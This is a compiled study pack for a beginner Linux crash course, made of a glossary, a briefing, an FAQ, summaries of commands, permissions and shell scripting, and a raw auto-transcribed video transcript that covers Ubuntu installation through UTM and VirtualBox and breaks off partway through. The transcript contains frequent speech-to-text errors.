    4. Describe the process of installing Ubuntu on both macOS (using UTM) and Windows (using VirtualBox). What are the key differences and considerations for each platform?
    5. Discuss the importance of Linux file permissions and user management in maintaining a secure and stable system. Provide examples of how incorrect permissions can lead to security vulnerabilities.

    Glossary of Key Terms

    • Linux: A powerful and flexible open-source operating system kernel.
    • Distribution (Distro): A specific version of Linux that includes the kernel and other software.
    • Open Source: Software with source code that is publicly available and can be modified and distributed.
    • Terminal: A text-based interface used to interact with the operating system.
    • Shell: A command-line interpreter that executes commands entered in the terminal.
    • Zsh (Z Shell): An extended version of the Bourne shell with advanced features and plugin support.
    • Oh My Zsh: An open-source framework for managing Zsh configuration.
    • Command: An instruction given to the operating system to perform a specific task.
    • Option (Flag): A modifier that changes the behavior of a command.
    • Argument: Input provided to a command that specifies the target or data to be processed.
    • Sudo: A command that allows users to run programs with the security privileges of another user, typically the superuser (root).
    • UTM: An application that allows you to run operating systems on macOS devices.
    • VirtualBox: Virtualization software that allows you to run different operating systems on your computer.
    • Operating System: The software that manages computer hardware and software resources.
    • Server: A computer or system that provides resources, data, services, or programs to other computers, known as clients, over a network.
    • Root Directory: The top-level directory in a file system, from which all other directories branch.
    • File System: A method of organizing and storing files on a storage device.
    • Directory (Folder): A container in a file system that stores files and other directories.
    • GUI: Graphical User Interface. A user interface that allows users to interact with electronic devices through graphical icons and visual indicators such as secondary notation, as opposed to text-based interfaces, typed command labels or text navigation.

    Linux Crash Course: A Beginner’s Guide

    Okay, here’s a detailed briefing document summarizing the main themes and ideas from the provided text:

    Briefing Document: Linux Crash Course Review

    Overall Theme: This document is a transcript of a video presentation promoting a “Linux Crash Course.” The course aims to take complete beginners to a point of understanding and mastering Linux, particularly in the context of software engineering, DevOps, and related fields. The presenter emphasizes that Linux is a fundamental skill in these areas.

    Key Ideas and Facts:

    • Linux Overview:Linux is described as a “powerful and flexible operating system” developed by Linus Torvalds in 1991.
    • A key feature of Linux is that it’s “open source,” with developers worldwide contributing to its improvement and customization.
    • Linux boasts “stability, security, the ability of changing it to your needs, and performance.” This makes it preferred for servers globally.
    • Linux is used by “internet giants, scientific research companies, financial institutions, government agencies, educations,” and pretty much every single company out there.
    • Amigo’s code is actually deployed on a Linux server
    • Linux is versatile and used on “smartphones to service and also Raspberry Pi.”
    • Linux Distributions:Linux has different “flavors” called distributions.
    • Ubuntu is highlighted as the “most popular flavor of Linux.” It comes in server and desktop versions (with a graphical user interface).
    • Other distributions mentioned include Fedora, Debian, and Linux Mint.
    • Companies often customize Linux distributions to meet their specific needs.
    • Course Promotion:The presenter encourages viewers to subscribe to the channel and like the video.
    • The full 10-hour course is available on their website, with a coupon offered.
    • The course aims to “make sure that you become the best engineer that you can be.”
    • The course has a “Windows users as well as Mac users”
    • Setting up Linux (Ubuntu) on Different Operating Systems:Mac: The presentation details how to install Ubuntu on a Mac using an application called UTM (a virtualization software).
    • Windows: Installation of Ubuntu through VirtualBox.
    • Understanding the Terminal:The terminal allows users to interact with the operating system by entering commands.
    • Understanding the shellshell is a program for interacting with the operating system.
    • Z Shell (zsh)zsh also called the zshell is an extended version of Bor shell with plenty of new features and support for plugins and themes
    • Linux CommandsThey are case sensitive
    • Linux File SystemThe Linux file system which is the hierarchical structure used to organize and manage files and directories in a Linux operating system
    • Files and PermissionsLinux is a multi-user environment where allows us to keep users files separate from other users
    • Shell scriptingIt is essentially a command line interpreter

    Quotes:

    • “If you don’t know Linux and also if you are afraid of the terminal or the black screen then you are in big trouble so this course will make sure that you master Linux”
    • “Linux is a must and don’t you worry because we’ve got you covered”
    • “Linux it’s a powerful and flexible operating system”
    • “Linux is open source developers around the world contribute to improve and customize the operating system”
    • “servers around the world prefer Linux due due to its performance”
    • “Linux is open source but it’s also used on a wide range of devices from smartphones to service and also Raspberry Pi”
    • “Ubuntu is the most popular flavor out there”
    • “At Amigo’s code we want to make sure that you become the best engineer that you can be”
    • “So many original features were added so let’s together in install zsh and as you saw the default shell for Mac OS now is zsh or zshell”
    • “We’ve got Bash as well as chh Dash KS sh T C CH and then zsh”

    Potential Audience:

    • Beginners with little to no Linux experience.
    • Software engineers, DevOps engineers, backend/frontend developers.
    • Individuals seeking to enhance their skills and career prospects in the tech industry.

    In summary: The document outlines a Linux crash course that aims to provide individuals with the necessary skills to confidently navigate and utilize the Linux operating system in various professional tech roles. It covers core concepts, practical setup, and promotes the course as a means to become a proficient engineer.

    Linux and Shell Scripting: A Quick FAQ

    FAQ on Linux

    Here is an 8-question FAQ about Linux and shell scripting, based on the provided source material.

    1. What is Linux and why is it important for aspiring engineers?

    Linux is a powerful and flexible operating system developed by Linus Torvalds in 1991. Its open-source nature allows developers worldwide to contribute to its improvement and customization. Its stability, security, and performance make it a preferred choice for servers and various devices, ranging from smartphones to Raspberry Pi. For aspiring software, DevOps, or backend engineers, understanding Linux is crucial because most companies deploy their software on Linux servers, making it an essential skill.

    2. What are Linux distributions and how do they differ?

    Linux distributions (distros) are different “flavors” of the Linux operating system, each customized to suit specific needs. Popular distributions include Ubuntu, Fedora, Debian, and Linux Mint. Ubuntu, particularly its server and desktop versions, is a popular choice for many, while other distributions cater to specific requirements in different companies. The source material mentions Ubuntu will be used in the course.

    3. How can I install Linux (Ubuntu) on my Mac?

    On a Mac, Ubuntu can be installed using virtualization software like UTM. First, download and install UTM from the Mac App Store. Then, download the Ubuntu server ISO image from the Ubuntu website. Within UTM, create a new virtual machine, selecting the downloaded ISO image as the boot source. Configure memory and disk space as needed, and start the virtual machine to begin the Ubuntu installation process. The source material also highlights the Ubuntu gallery in UTM.

    4. How can I install Linux (Ubuntu) on my Windows machine?

    On Windows, you can use VirtualBox. The steps include downloading and installing VirtualBox. Then download the Ubuntu desktop ISO image from the Ubuntu website. Create a new virtual machine in VirtualBox, selecting the downloaded ISO image. Configure memory and disk space. Install ubuntu to the VM.

    5. What is the difference between the Terminal and the Shell?

    The terminal is a text-based interface that allows you to interact with the operating system by entering commands. It provides the prompt where commands are entered and outputs the results. The shell, on the other hand, is the program that interprets the commands entered in the terminal and executes them against the operating system. Shells include Bash, Zsh, Fish, and others.

    6. What is Zsh and how do I switch from Bash to Zsh?

    Zsh (Z shell) is an extended version of the Bourne shell, known for its advanced features like auto-completion, spelling correction, and a powerful plugin system. To switch from Bash to Zsh, first install Zsh using the command sudo apt install zsh. Then, change the default shell using the command chsh -s /usr/bin/zsh. After rebooting the system, Zsh will be the default shell. Oh My Zsh can be used to configure Zsh.

    7. What are Linux commands, options, and arguments?

    Linux commands are text instructions that tell the operating system what to do. They are case-sensitive. A command can include options and arguments that modify its behavior. For example, in the command ls -a ., ls is the command, -a is an option (for showing hidden files), and . is the argument (specifying the current directory).

    8. What are user types and how do permissions work?

    Linux is a multi-user environment with two main types of users: normal users and the superuser (root). Normal users can modify their own files but cannot make system-wide changes. The superuser (root) can modify any file on the system. Permissions control access to files and directories. The ls -l command displays file permissions, divided into three sets: user, group, and others. Each set includes read (r), write (w), and execute (x) permissions, dictating what actions each user type can perform on the file.

    Understanding Linux: Features, Usage, and Commands

    Linux is a powerful and flexible open-source operating system that was developed by Linus Torvalds in 1991 and has since become a robust platform used worldwide. Here’s an overview of some key aspects of Linux:

    • Open Source Linux is open source, meaning developers can contribute to improving and customizing it.
    • Key Features Stability, security, customizability, and performance are key features. Its flexibility and security make it a preferred choice for companies.
    • Usage Linux is used by internet giants, scientific research companies, financial institutions, government agencies, and educational institutions. Many companies deploy their software on Linux.
    • Distributions Linux has different versions called distributions, with Ubuntu being the most popular. Other distributions include Fedora, Debian, and Linux Mint.
    • Terminal In Linux, the terminal (also known as the command line interface or CLI) is a text-based interface that allows interaction with the computer’s operating system by entering commands. It provides a way to execute commands, navigate the file system, and manage applications without a graphical user interface.
    • Shell A shell is a program that interacts with the operating system. The terminal allows users to input commands to the shell and receive text-based output from the shell operations. The shell is responsible for taking the commands and executing them against the operating system.
    • File System The Linux file system is a hierarchical structure that organizes and manages files and directories. It follows a tree structure with the root directory at the top, and all other directories are organized below it.
    • Commands Linux commands are case-sensitive text instructions that tell the operating system what to do.
    • Shell Scripting Shell scripting automates tasks and performs complex operations by creating a sequence of commands. A shell script is saved with the extension .sh.

    Shell Scripting Fundamentals in Linux

    Shell scripting is a way to automate tasks and perform complex operations in Linux by creating a sequence of commands. It involves writing scripts, typically saved with a .sh extension, that contain a series of commands to be executed.

    Key aspects of shell scripting include:

    • Bash Bash (Born Again Shell) is a command line interpreter used to communicate with a computer using text-based commands.
    • Editor A text editor is needed to write scripts, which could be a simple editor like Vim or a more feature-rich option like Visual Studio Code.
    • Shebang The first line of a shell script typically starts with a “shebang” (#!) followed by the path to the interpreter (e.g., #!/bin/bash). This line tells the operating system which interpreter to use to execute the script.
    • Variables These are containers for storing and manipulating data within a script. In Bash, variables can hold various data types like strings, numbers, or arrays.
    • Conditionals These allow scripts to make decisions based on specific conditions, executing different blocks of code depending on whether a condition is true or false.
    • Loops Loops enable the repetition of instructions. for and while loops can iterate over lists, directories, or continue tasks until a condition is met.
    • Functions Functions group a set of commands into a reusable block, promoting code modularity and organization.
    • Comments Adding comments to scripts is considered a best practice as it helps in understanding the script’s purpose, functionality, and logic. Comments are lines in a script that are not executed as code but serve as informative text.
    • Passing Parameters Bash scripts can receive input values, known as parameters or arguments, from the command line, allowing customization of script behavior. These parameters can be accessed within the script using special variables like $1, $2, $3, etc. The special variable $@ can be used to access all parameters passed to the script.
    • Executable Permissions Scripts are executables that require giving executable permissions using chmod.

    To run a shell script:

    1. Save the script with a .sh extension.
    2. Give the script executable permissions using the chmod +x scriptname.sh command.
    3. Execute the script by using its path. If the script is placed in a directory included in the PATH environment variable, it can be run by simply typing its name.

    Linux File Management: A Command-Line Guide

    File management in Linux involves organizing, creating, modifying, and deleting files and directories. This is primarily done through the command-line interface (CLI) using various commands.

    Key aspects of file management include:

    • Linux File System: The file system is a hierarchical structure with a root directory (/) at the top, under which all other directories are organized.
    • Essential Directories:
    • /bin: Contains essential user commands.
    • /etc: Stores system configuration files.
    • /home: The home directory for users, storing personal files and settings.
    • /tmp: A location for storing temporary data.
    • /usr: Contains read-only application support data and binaries.
    • /var: Stores variable data like logs and caches.
    • Basic Commands
    • ls: Lists files and directories. Options include -a to show hidden files and -l for a long listing format that includes permissions, size, and modification date.
    • cd: Changes the current directory. Using cd .. moves up one directory level. Using cd – flips between the previous and current directory.
    • mkdir: Creates a new directory. The -p option creates nested directories.
    • touch: Creates a new file.
    • rm: Removes files.
    • rmdir: Removes empty directories.
    • cp: Copies files.
    • File Permissions: Linux uses a permission system to control access to files and directories. Permissions are divided into three categories: user, group, and others. Each category has read (r), write (w), and execute (x) permissions. The ls -l command displays file permissions in a long listing format.
    • Working with Files:
    • To create an empty file, use the touch command.
    • To create a file with content, use the echo command to redirect a string into a file.
    • To view the contents of a file, you can use a text editor or command-line tools like cat.
    • Working with Directories:
    • To create directories, use the mkdir command.
    • To remove empty directories, use the rmdir command.
    • To remove directories and their contents, use the rm -rf command.
    • Navigating the File System To navigate, utilize the cd command followed by the directory path.

    It is important to note that commands are case-sensitive.

    Linux User and File Permissions Management

    User permissions in Linux control access to files and directories in a multi-user environment. Here’s an overview:

    • Types of Users There are normal users and superusers (root).
    • Normal users can modify their own files but cannot make system-wide changes or alter other users’ files.
    • Superusers (root) can modify any file on the system and make system-wide changes.
    • Commands for User Managementsudo: Executes a command with elevated privileges.
    • useradd -m username: Adds a new user and creates a home directory.
    • passwd username: Sets the password for a user.
    • su username: Substitutes or switches to another user.
    • userdel username: Deletes a user.
    • File Permissions Permissions determine who can read, write, or execute a file.
    • The ls -l command displays file permissions in a long listing format. The output includes the file type, permissions, number of hard links, owner, group, size, and modification date.
    • The file type is the first character. A d indicates a directory, and a – indicates a regular file.
    • Permissions are divided into three sets of three characters each, representing the permissions for the user (owner), group, and others.
    • r means read, w means write, and x means execute. A – indicates that the permission is not granted.
    • The first three characters belong to the user, the second three to the group, and the last three to everyone else.

    Essential Linux Terminal Commands

    Linux terminal commands are case-sensitive text instructions that tell the operating system what to do. These commands are entered in the terminal (also known as the command line interface or CLI), allowing you to interact with the operating system. The terminal provides a way to execute commands, navigate the file system, and manage applications without a graphical user interface.

    Here are some basic and essential commands:

    • ls: Lists files and directories.
    • ls -a: Includes hidden files.
    • ls -l: Uses a long listing format, displaying permissions, size, and modification date.
    • cd: Changes the current directory.
    • cd ..: Moves up one directory level.
    • cd -: Flips between the previous and current directory.
    • mkdir: Creates a new directory. The -p option creates nested directories.
    • touch: Creates a new file.
    • rm: Removes files.
    • rmdir: Removes empty directories.
    • cp: Copies files.
    • sudo: Executes a command with elevated privileges.

    Each command may have options and arguments to modify its behavior. To understand how to use a command effectively, you can refer to its manual for instructions.

    Linux For Beginners – Full Course [NEW]

    The Original Text

    what’s going guys assalamualaikum welcome to this  Linux crash course where I’m going to take you   from complete beginner to understanding Linux this  is a course that abs and I put together and it’s   currently 10 hours which a bunch of exercises  if you don’t know Linux and also if you are   afraid of the terminal or the black screen then  you are in big trouble so this course will make   sure that you master Linux and whether you want to  become a software engineer devops engineer backend   front end it doesn’t really matter Linux is a  must and don’t you worry because we’ve got you   covered if you’re new to this channel literally  just take 2 seconds and subscribe and also smash   the like button so we can keep on providing you  content like this without further Ado let’s off   this video okie dokie let’s go ahead and kick off  this course with this presentation which I want   to go through so that you have a bit of background  about Linux so Linux it’s a powerful and flexible   operating system that was developed by lonus tals  in 1991 so the name Linux comes from the Creator   Linus and since 1991 Linux has grown into a robust  and reliable platform used by millions worldwide   as you’ll see in a second the cool thing about  Linux unlike operating systems such as Windows Mac   OS is that Linux is open source developers around  the world contribute to improve and customize the   operating system and it has a Vibrant Community  of contributors and I’ll talk to you in a second   about distributions as well because it plays a big  part since Linux is open source the key features   of Linux are stability security the ability of  changing it to your needs and performance so   servers around the world prefer Linux due due to  its performance so who uses Linux well interned   Giants scientific research companies financial  institutions government agencies educations and   the platform that you are using right now so  Amigo’s code is actually deployed on a Linux   server so you look at Google meta AWS NASA  and obviously Amigo’s code and pretty much   like every single company out there majority of  them I can guarantee you that their software is   being deployed on Linux it might be a different  flavor of Linux but it will be Linux and the   reason really is because of the flexibility  and it’s secure so this is why companies opt   to choose Linux and the cool thing about Linux  is that it’s open source as I’ve mentioned but   it’s also used on a wide range of devices from  smartphones to service and also Raspberry Pi so   if you’ve ever used a Raspberry Pi the operating  system on this tiny computer is Linux Linux has   something called distributions and these are  different flavors the most popular flavor of   Linux is Ubuntu and you have the iunu server or  the desktop which comes with a graphical user   interface and this distribution is what we’re  going to use and is the most popular out there   but obviously depending on the company that  you work for the software will be deployed on   a different flavor of Linux to customize their  needs but there are also other distributions   such as Fedora Debian Linux Mint and plenty  of others and this is a quick overview about Linux cool before before we actually proceed  I just want to let you know that the actual   10 hour of course is available on our brand  new website and I’m going to leave a coupon   and a link as well where you can basically go  and check for yourself because many of your   students already have engaged with the course  they’ve been learning a lot and to be honest   the positive has been really really great so far  so we are coming up with something really huge   and we decided that Linux had to be part of this  something and here Amigo’s codee we want to make   sure that you become the best engineer that you  can be details will be under the destion of this video okie dokie for the next two sections  we’re going to focus on Windows users as   well as Mac users and just pick the operating  system that you are using and go straight to   that section because the setup will be the  exact same thing so I’m going to show you   how to get Linux and you bu to up and running  on your operating system if you want to watch   both sections feel free to do so uh but in this  course I just want to make sure that there’s no   issues when it comes to Windows or Mac because  there’s a huge debate which uh is better and   also um after those two sections you’ll see  how to rent a server of the cloud okay so   if you don’t to use nor um yunto or Linux on  your local machine but you prefer to rent it   from the cloud I’m also going to show you how  to do so cool this is pretty much it let’s get started in order for us to install Ubuntu on  a Mac operating system we’re going to use this   application called UTM which allows you to  securely run operating systems on your Mac   whether it’s window Window XP which I really  doubt that you’re going to do windows I think   this is Windows 10 maybe you can also run your  buntu which is the one that we’re going to run   and also like old operating systems in here also  Mac as well so you can virtualize Mac and um I’ll   basically walk you through how to use it and  install yuntu right here which is what we need   in order to get up and running with Linux cool  so in here what we’re going to do is click on   download and you can download from the Mac Store  then pretty much save this anywhere so in my case   I’m going to save it on my desktop and just give  a second to download cool then on my desktop I’m   going to open up this UTM DMG there we go and all  I’m going to do is drag this to applications and   job done now let me close this and also I’m  going to eject UTM and also I’m going to get   rid of this UTM file in here and now I’m going to  press command and then space and we can search for   UTM and then I’m going to open and I’m going to  continue and there we go we successfully installed UTM the next thing that we need is to install  Ubuntu navigate to ubuntu.com and in this page   in here we can download yuntu by clicking on  download and then what I want you to do is   let’s together download the Ubuntu server and  I’ll show you how to get the desktop from the   Ubuntu Server so here you can choose Mac and  windows so I’ve got the arm architecture so   I’m just going to choose arm in here if you  are on regular Mac and windows you can just   basically download your Windows server for  the corresponding architecture and operating   system so here I’m going to click on arm and  you can read more about it in here so this is   the I think this is the long-term support 2204 and  then two and right here you can see that you can   download the long-term support or I think this  is the latest version in here so in my case it   doesn’t really matter which version I download so  I’m just going to download the long-term support   in here so this my bugs who knows so here let’s  just download and I’m going to store this onto my desktop now just give it a minute or so so  my internet is quite slow and you can see the   download still uh in progress but once this  finishes I will um come back to you awesome   so this is done also what I want to show you  is within UTM you can click on on browse UTM   gallery or you can get to it via so in here  if I switch to the UTM official website in   here click on gallery and basically this gives  you a gallery of I think the operating systems   which are currently supported so you can see Arch  Linux Debian Fedora Kali Linux which is quite nice   actually and then you have Mac OS you have Ubuntu  I think this is the older version actually you’ve   got the 20.01 which is the long-term support  Windows 10 11 7 and XP so if you want to go   back to olden days feel free to do so but  we just downloaded yuntu from the official   website which is good and also have a look the  architecture in here so arm 64 x64 right so make   sure to pick the one which is corresponding to  you so if you want to have for example Windows   as well feel free to download an experiment or  a different version of Linux so K Linux which   is quite nice actually feel free to do it but  in my case I’m going to stick with traditional   buntu and next what we’re going to do is to  create a virtual machine and have Linux up and running right we have UTM as well as the iso  image in here for Ubuntu let’s create a brand new   virtual machine and in here we want to virtualize  never emulate so here this is slower but can run   other CPU architectures so in our case we want to  virtualize and the operating system is going to be   Linux leave these and check and in here boot ISO  image open up the iso that we’ve just downloaded   right so here browse and I’ve just opened up  the Ubuntu 22.0 4.2 the next step is going to   be continue and here for memory usually you should  give half of your available memory so in my case   I’m just going to leave four gigs I’ve seen that  it works quite well and I do actually have 32 but   I’m not giving 16 so I’m just going to leave four  in here and CPU course I’m G to leave the default   and here if you want to enable Hardware open  Gil acceleration you can but there are known   issues at the moment so I’m not going to choose  it continue 64 gig so this is the size of the dis   continue and here there’s no shared directory path  continue and for the name in here what I’m going   to do is say YouTu and then the version so 20.0  four dot and then two awesome so you can double   check all of these settings and I think they’re  looking good click on Save and there we go so at   this point you can see that we have the VM in here  so we’re going to start it in a second we can see   the status is stopped the architecture arm the  machine memory 4 gig the size this will increase   in a second and there’s no shared directory but  the cd/ DVD is yuntu which is this one in here so   one more thing that I want to do is so before  we play I want to go to settings so in here   click on settings and you can change the name  if you want to in here and uh all I want really   is within this play I’m going to choose retina  mode and this will give me the best performance   cool so save and I’m good to go next let’s go  ahead and install Ubuntu within our virtual machine oky dokie now the next step for us is to  click on play in here or in here and this should   open this window so in here you can see that  currently so I’m just gonna leave the the screen   like this so currently you can see that it says  press option and um I think it’s enter for us to   release the cursor So currently my cursor is not  visible right and the way that I can interact with   this UI is by using my keyboard so the down arror  in here and the app Arrow right so if you want   your cursor back you just press control and then  option I think control option there we go you can   see that now I have the mouse in here cool let me  just close this in here for a second and I’m going   to Center this like so and now what we’re going  to do is try or install Ubuntu Server so I’m going   to press enter on my keyboard so display output  is not active just where a second and we should   have a second screen there we go you can see that  now we have this other the screen and basically   now we can basically configure the installation  process so in my case I’m going to use English UK   and here so for you whatever country you are just  use the correct country basically so here English   UK for me press enter Then the layout and the  variant so for the keyboard I want to leave as   default and at the bottom you can see that I can  flick between done and back so I’m just going to   say done and I’m going to leave the default  so I want the default installation for you Bo   to server not the minimized so just press enter  and here there’s no need to configure the network   connections continue no need to configure proxy  and also the mirror address just leave as default   enter and in here configure a guided storage so  here I’m going to use the entire disk and leave   as default so just with my errors go all the way  to done enter and here now we have the summary   and you can see the configuration basically 60 gig  and I think the available free space is 30 gig and   you can see there and at this point I you sure  you want to continue I’m going to say continue   now for the name I’m going to say Amigos code the  server name I’m going to say Amigos code the usern   name Amigos code the password I’m going to have  something very short and Easy in here and then   go to done continue and I’m not going to enable  yuntu Pro continue continue there’s no need to   install open SSH server because we don’t need to  remote access this server that we are installing   so here done and also we have a list of available  software that we can install so for example micro   Kates nexcloud Docker you can see AWS CLI in here  so a CLI Google Cloud SDK we don’t need none of   these also postgress which is right here so if  you want to install these by all means feel free   to take but for me I’m going to leave everything  as default done and at this point you can see that   what he doing is installing the system so just  wait for a second and I’m going to fast forward   this step oky doie so you can see that the  installation is now complete and at this point   what it’s doing is downloading and installing  security updates so it’s really up to you whether   you want to wait for this or not but in my case  I think it’s you know the best practice for you   to have everything patched and um updated so I’m  just going to wait and then I’ll tell you what are   the next steps so this might take a while so just  sit back and relax all right so this is now done   and you can see that installation is complete and  we can even say reboot now but don’t don’t click   reboot now what we need to do is so basically we  have to close this so again close this window will   kill the virtual machine which is fine okay now  open UTM once more and you can see that we have   the Ubuntu virtual machine in here and if I open  this up once more so all I want to show you is   that this will take us to the exact same screen  to install yuntu server now we don’t want this so   close this and what we have to do is in here  so CD DVD clear so we have to remove the iso   image and at this point feel free to delete this  so here I’m going to delete this and that’s it   cool so this is pretty much the installation for  Ubuntu next let’s get our Ubuntu Server up been running cool so make sure that this CD for/ DVD  is empty before you press continue or before   you press play so let’s just play this there  we go and I can close this and I’m going to   Center things there we go and at this point we  should see something different there we go now   have a look yuntu the version that we installed  and then it says Amigos code login cool so here   what we need to do is I think we have to add  the username which is Amigos code then press   enter followed by by the password so my password  was I’m not going to tell you basically but it’s   a very simple one so here you don’t see the  password that you type so just make sure that   you have the username and the password press  enter and check this out so now we are inside   and we’ve managed to log in cool so at this point  this is actually yuntu server right so there’s no   graphical user interface and um that’s it right  so later you’ll see that when you SSH into the   servers this is what you get right so this black  screen and that’s it now obviously for us I want   to basically install a graphical user interface  so that basically you see the Ubuntu UI and um   the applications I I’ll show you the terminal  and whatnot but in a shell this is yuntu server   so at this point you can type commands so here  for example if you type LS for example just L   and then s press enter nothing happens if you type  PWD so these are commands you learn about these uh   later but if I press enter you can see that I’m  within home/ Amigos code if I type CD space dot   dot so two dots enter you can see that now if I  type PWD I’m within home okay so this is pretty   much the yuntu server and this is a Linux box  that we can interact with but as I said we want   to install a graphical user interface to simplify  things for now and that’s what we’re going to do next within the official page for UTM navigate  to support in here and I’ll give you this link   so you can follow along but basically they give  you the installation Pro process and things that   you should be aware when working with UTM now  one of the things is if we click on guides or   expand you can see that you have the different  operating systems so Debian 11 Fedora Cali yuntu   Windows 10 and 11 so we installed 2204 so let’s  open that and it doesn’t really matter just click   on your BTU and whatever version here um that  you have installed this will be the exact same   thing okay so just select yuntu anything that says  going to in here cool so if I scroll down in here   so they have a section so we’ve done all of this  creating a new virtual machine and basically here   installing you B to desktop if you install you B  to server then at the end of the installation you   will not have the graphical user interface to  install we need to run these commands in here   so sudu apt and then update and then install and  then reboot awesome let’s go ahead and run these   commands cool so in here within in Yun to server  let me see if I can increase the font size for   this so control and then plus and it doesn’t look  like I can but I’ll show you how to increase the   font size for this in a second but here let’s  type together PSE sudo and then a and then   update press enter and then it’s asking me for  the password for Amigos code so make sure you   add the password for your username press enter  and you can see that it’s basically performing   the update now now the update basically is used  to update the package index files on the system   which contains information about the available  packages and their versions cool so you can see   that 43 packages can be upgraded now if you  want to upgrade the packages we can run PSE   sudo and then AP so let me just remove the mouse  from there ABT space and then up and then grade   and here I’m going to press enter and we could  actually use flags and we could say Dy but for   now let’s just keep it simple and later you learn  about these commands so press enter and you can   see that it says that the following packages will  be upgraded right so you see the list of all the   packages do you want to continue I can say why  why for yes cool now just give it a second and   now it’s actually upgrading these packages to  their latest versions so it’s almost done and   and now it says which Services should be restarted  leave everything as default and say okay so I’m   just going to press the tab and then okay cool  that’s it so now the last thing that we need to   do is to install Yun desktop so this point type  sud sudo a and then install Ubuntu Dash and then   desk and then top press enter and you can see  that it gives us a prompt I’m going to say w   and now we’ve go prompt and it says do you want  to continue I’m going to say y for yes and now   we just have to wait until it installs the Yun  to desktop and this is pretty much the graphical   user interface that will allows us to interact  with our operating system like we are using for   example the Mac OS right so this is the graphical  user interface but equally we do have the terminal   so if I open up the terminal quickly so terminal  so have a look so this is the terminal right so so   what we doing is we are basically installing the  same experience that we have within Mac OS so if   I click on the Apple logo and then basically use  all of the functionalities that this operating   system has to offer right so if I click on about  this Mac and then I can go to more info so on and   so forth so let me just cancel this and just wait  for a second until this finishes oky doie cool so   this is done and if you encounter any errors  or anything whatsoever just restart and then   run the exact same command but here you see that  there were no errors cool at this point there’s   no services to be restarted no containers and  all we have to do is re and then boot now just   wait for it and hopefully now at this point  you should go straight into the desktop okie   dokie you can see that now we managed to get the  desktop app and running cool so at this point just   click on it the password so this is my password  and I’m going to press enter hooray and we’ve   done it cool so if you managed to get this far  congratulations you have successfully installed   yuntu otherwise if you have any questions drop  me a message next let’s go ahead and set up Ubuntu okie dokie so we have yuntu desktop up  and running and from this point onwards let me   just put this as full screen and for some reason  I have to log in again again that’s fine cool so   you can see that the UI looks nice and sharp  and in here let’s just um basically say next   we don’t want to install the btu Pro and in  here whether you want to send information to   developers I don’t really mind to be honest  and location I’m just going to turn it off   and here it says you’re ready to go and let’s  just say done cool we have the home so here I   can just put this on this side and what we’re  going to do here is some customization this is   actually an operating system so you’ve got a  few things in here so you’ve got mail client   you’ve got files so if I click on files you  know this is a file system you know the same   as I have in my Mac so here let me just close  this and what I want to do is I want to go to   show all applications or I could just right  click in here and then I can say a few things   so one is display settings this is what I’m  mostly interested so in here I’m going to   put things a little bit bigger so fractional  scaling and here I’m going to increase this by 175% apply so that things are quite visible to  you so here keep changes and you can see that   now it’s nice and big cool so just move this in  here and it doesn’t look like it lets me right   So eventually it will let me move this but also  I can click on show all applications and I can go   to settings through here so the same thing and um  cool so you can go to keyboards you can you know   change according to your layout so I’m going to  leave my one as English UK which is fine you can   go to displays you can change the resolution if  you want to power configure that whether you want   power saver mode or not and um online accounts  so here I’m not going to connect to anything   privacy go back and I’m just showing you around  so background if you want to change the background   you’re more than welcome to do so here a couple of  different ones but for me I’m going to stick with   the default and appearance as well you can change  this right so here if you want a blue theme for   example which I kind of like to be honest or this  purple right here so let’s just actually choose   this blue for myself and for the desktop size  I’m going to say Lodge in here so that things   are visible to you okay and I can scroll down  and also icon size just as big as this and you   can show Auto Hide dock does that work probably  I don’t know right so I think it hides when yes   when this collides with this right so basically at  this point it just hides cool let me just remove   that I don’t think I need that and notifications  so you can go through and customize this the way   you want it but for us I think this is looking  good one other thing also is if you have a window   opened you can basically pull it all the way to  the left and it will just snap so if I open a   new so let’s just say I have um a new window for  example I can put this right in here and you can   see that it auto arranges for me which is kind  of nice and uh to be honest I think I’m going   to stick with the red so red not not there but I  think it was appearance yes I think this orange   or actually orange I think this orange looks nice  yeah I don’t know it’s very difficult cool so I   think I’ll just stick with this default for now  cool and um yeah so let me just close this and   this and this is pretty much it uh I don’t know  for some reason why this is not um oh actually let   me just click on arrange icons maybe that will  do it no I think it doesn’t do it because it’s   too big it doesn’t want to move but I think if I  restart then it should basically sort itself out   uh the other thing is so in here yes so here I can  basically remove so I’m going to remove this from   favorites same as this so stop and quit and remove  favorites the same with this and no need for help   and I think this is pretty much it awesome this  is my setup and also I think the clock is I think   it’s 1 hour behind so feel free to fix that but to  me it doesn’t really matter so this is pretty much   it if you have any questions drop me a message  but this is the configuration required for yuntu in order for us to install yuntu desktop on  Windows let’s use Virtual box which basically   allows you to install and run a large number  of guest operating systems so here you can   see uh Windows XP which I doubt you’ll ever use  Vista Windows and then Linux in here Solaris so   these are different distributions but basically we  need virtual box in order to install another guest   operating system on top of windows so navigate to  downloads and in here download the Windows host   so just give it a second and then open file there  we go I’m going to say next so the installation   process should be really straightforward and don’t  worry about this warning in here so just say say   yes and then it says missing pice dependencies  do you want to install it yes why not and then   install cool so this should take a while and you  can see that we have the shortcut being created   for us in here and we are good to go so let me  just unake this because we’re going to continue on   the next video say finish and we have successfully  installed virtual box catch me on the next one we do have virtual box installed and before I open  this application in here the next thing that we   need is the Ubuntu desktop itself so that we can  mount on top of virtual box so in here if I open   up my web browser and search for Ubuntu on Google  and basically go to ubuntu.com and you you should   see so if I accept in here you should see that  we can download so we have yunto server in here   and this is the current version as I speak and  whatever version that you see provided that is the   sorry this is not the latest this is the long-term  support but whatever long-term support you see   just download that so here go to developer and you  should see that we have yuntu desktop so click on   that and we can download yuntu desktop so you can  watch this video if you want but I’m not going to   but if I scroll down you can see that it says that  your buntu comes with everything you need to run   your organization School home or Enterprise and  you can see the UI in here so on and so forth so   let’s go ahead and download yuntu cool now if  I scroll down in here you can see that we have   this version so long-term support just download  whatever long-term support you see available so download and it should start very soon there we  go and it should take about 5 minutes or so to   complete or even less now and there we go now  let me open this on my desktop and you can see   that it’s right here awesome now that we have  Ubuntu desktop next let’s go ahead and uh use   Virtual box to install this ISO image in here  this is pretty much it catch me on the next one cool let’s open up virtual box in here  and I’ll walk you through the steps required   to get yuntu desktop up been running so if this  is the first time that you’re using virtual box   this should be completely empty so what we’re  going to do is create new and here we’re going   to name this as yuntu there we go and you can put  the version if you want but I’m going to leave it   as is then for the iso image is the one that we  downloaded so here let’s just select order and   then navigate to desktop and I’ve got my Ubuntu  ISO image open cool and in here you can see that   basically we can’t really select anything else  so let’s just click next and we can actually   have the username and password so in my case I’m  going to say Amigos and then code there we go and   then choose the password so if I click on this  I icon in here you can see that it says change   me right so you can change this or you can leave  it as default so in my case I’m going to leave as   change me but obviously I would never do this  and I want want to leave the host name as you   B to domain as uh 